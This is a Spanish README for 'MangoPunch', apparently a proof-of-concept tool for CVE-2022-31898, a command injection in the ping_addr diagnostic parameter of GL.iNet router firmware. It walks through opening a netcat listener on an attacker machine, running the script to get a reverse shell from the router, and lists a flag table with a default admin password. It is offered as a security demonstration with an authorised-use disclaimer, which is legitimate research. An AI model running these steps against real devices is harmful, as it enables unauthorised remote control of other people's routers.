
Herramienta de Inyección de Comandos Autenticada (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
Este repositorio contiene una Prueba de Concepto (PoC) técnica para una vulnerabilidad de Ejecución Remota de Comandos (RCE) encontrada en el GL.iNet MT300N-V2 (Mango) y otros modelos que ejecutan versiones de firmware inferiores a 3.215.
La falla existe en el parámetro ping_addr de la API de diagnóstico, permitiendo a un atacante autenticado ejecutar comandos arbitrarios del sistema a través de metacaracteres de shell (;).
Abre una terminal en tu máquina atacante (Kali Linux) e inicia un listener de Netcat:
nc -lvnp 9292
Usa el siguiente comando para activar la shell inversa:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
Aviso Legal: Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El autor no se hace responsable de ningún uso indebido. MangoPunch: CVE-2022-31898
| Flag | Nombre Completo | Descripción | Por Defecto |
|---|
-R | --rhost | IP del objetivo remoto (Router) | Requerido |
-P | --rport | Puerto de administración web | 443 |
-L | --lhost | IP del listener (Kali/Atacante) | Requerido |
-l | --lport | Puerto del listener | Requerido |
-p | --pwd | Contraseña de administrador | goodlife |
-t | --https | Habilitar HTTPS | False |